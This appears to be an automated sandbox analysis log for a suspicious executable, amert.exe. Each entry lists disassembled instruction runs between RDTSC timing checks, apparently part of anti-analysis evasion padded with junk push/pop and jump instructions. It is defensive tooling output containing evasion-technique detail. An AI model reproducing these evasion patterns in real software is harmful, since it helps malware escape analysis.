Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD657 second address: 8CD682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0D7555855Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558565h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD682 second address: 8CD68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D755569D6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8CD95E second address: 8CD962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8D13AA second address: 8D13B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E4086 second address: 8E40C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0D75558556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007F0D75558556h 0x00000016 jp 00007F0D75558556h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 jc 00007F0D75558556h 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007F0D75558561h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E40C0 second address: 8E40DD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D755569E8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E76 second address: 8E3E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0D75558569h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E9A second address: 8E3E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3E9E second address: 8E3EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0D75558569h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3EC7 second address: 8E3ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E3ECB second address: 8E3ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8E1412 second address: 8E1421 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0D755569D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1350 second address: 8F1354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1354 second address: 8F135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F135A second address: 8F137D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnp 00007F0D75558556h 0x00000011 js 00007F0D75558556h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F137D second address: 8F1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0EAC second address: 8F0EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558567h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0EC8 second address: 8F0ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0ECE second address: 8F0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F0D75558558h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007F0D7555856Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F0F00 second address: 8F0F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8F1084 second address: 8F108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90B9E5 second address: 90BA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F0D755569EFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BA0E second address: 90BA18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D7555855Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BB68 second address: 90BB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BB6E second address: 90BB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90BE47 second address: 90BE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90C28F second address: 90C2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0D75558566h 0x0000000e jbe 00007F0D7555855Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D75558569h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 90C494 second address: 90C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 910C76 second address: 910C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D75558563h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 910F96 second address: 91102B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D755569E2h 0x00000012 push dword ptr [ebp+122D29ACh] 0x00000018 xor dword ptr [ebp+122D29A6h], edx 0x0000001e call 00007F0D755569D9h 0x00000023 jnc 00007F0D755569E5h 0x00000029 push eax 0x0000002a jng 00007F0D755569E9h 0x00000030 jmp 00007F0D755569E3h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jnc 00007F0D755569E2h 0x0000003f mov eax, dword ptr [eax] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop edx 0x00000046 push eax 0x00000047 pop eax 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 91102B second address: 911040 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F0D75558556h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E43 second address: 913E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F0D755569D6h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E53 second address: 913E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D7555855Ch 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007F0D75558556h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 913E73 second address: 913E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 9139BD second address: 9139C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 9139C8 second address: 9139CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0021 second address: 4FD0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0026 second address: 4FD002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD002C second address: 4FD0030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0030 second address: 4FD0054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 mov ch, 59h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0054 second address: 4FD0059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0059 second address: 4FD0089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569E5h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DA1 second address: 4FB0DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D75558561h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DB6 second address: 4FB0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D755569DDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0DDD second address: 4FB0E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D75558567h 0x00000009 sub si, 7DAEh 0x0000000e jmp 00007F0D75558569h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d call 00007F0D75558564h 0x00000022 pushfd 0x00000023 jmp 00007F0D75558562h 0x00000028 and al, FFFFFF88h 0x0000002b jmp 00007F0D7555855Bh 0x00000030 popfd 0x00000031 pop ecx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0D75558562h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E6D second address: 4FB0E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DCh 0x00000009 xor eax, 06CD4718h 0x0000000f jmp 00007F0D755569DBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E9A second address: 4FB0E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0E9E second address: 4FB0EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0EA4 second address: 4FB0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 500000E second address: 50000E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569E1h 0x00000009 add ecx, 57196D96h 0x0000000f jmp 00007F0D755569E1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0D755569DAh 0x00000022 add eax, 2A93D5B8h 0x00000028 jmp 00007F0D755569DBh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F0D755569E8h 0x00000034 and si, 9018h 0x00000039 jmp 00007F0D755569DBh 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F0D755569E9h 0x00000046 xchg eax, ebp 0x00000047 pushad 0x00000048 movzx ecx, di 0x0000004b pushfd 0x0000004c jmp 00007F0D755569E9h 0x00000051 sbb cx, 9316h 0x00000056 jmp 00007F0D755569E1h 0x0000005b popfd 0x0000005c popad 0x0000005d mov ebp, esp 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000E3 second address: 50000E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000E7 second address: 50000EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50000EB second address: 50000F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9014F second address: 4F90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90154 second address: 4F901BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0D75558566h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 75369F14h 0x00000016 pushfd 0x00000017 jmp 00007F0D7555855Dh 0x0000001c jmp 00007F0D7555855Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0D75558560h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F901BD second address: 4F901C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F901C1 second address: 4F901C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0B78 second address: 4FB0BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ch, dl 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F0D755569E2h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F0D755569DDh 0x00000021 xor cx, 9536h 0x00000026 jmp 00007F0D755569E1h 0x0000002b popfd 0x0000002c mov cx, 9127h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07A9 second address: 4FB07AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07AD second address: 4FB07F5 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 4Ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F0D755569DFh 0x0000000b mov si, AD5Fh 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0D755569E0h 0x00000019 adc ecx, 0DF9DDC8h 0x0000001f jmp 00007F0D755569DBh 0x00000024 popfd 0x00000025 pushad 0x00000026 mov ecx, 3E933555h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB07F5 second address: 4FB080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov cl, 37h 0x0000000a movsx edi, cx 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB080B second address: 4FB080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB080F second address: 4FB0813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0813 second address: 4FB0819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB06F7 second address: 4FB0757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F0D75558563h 0x00000009 mov edi, eax 0x0000000b pop ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov esi, edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 movsx ebx, cx 0x0000001c pushad 0x0000001d mov ecx, 1FA6E7A9h 0x00000022 pushfd 0x00000023 jmp 00007F0D75558566h 0x00000028 xor ax, BF78h 0x0000002d jmp 00007F0D7555855Bh 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0757 second address: 4FB075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0503 second address: 4FB0509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0509 second address: 4FB050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB050D second address: 4FB053E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558563h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558565h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01F1 second address: 4FC01F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01F7 second address: 4FC01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FC01FD second address: 4FC025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0D755569E0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0D755569E1h 0x00000019 and eax, 63D39056h 0x0000001f jmp 00007F0D755569E1h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov ecx, 6AB4CB1Dh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F14 second address: 4FF0F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F0D75558563h 0x00000011 pop eax 0x00000012 jmp 00007F0D75558569h 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F0D75558561h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F73 second address: 4FF0F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F77 second address: 4FF0F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F7B second address: 4FF0F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F81 second address: 4FF0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0F87 second address: 4FF0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
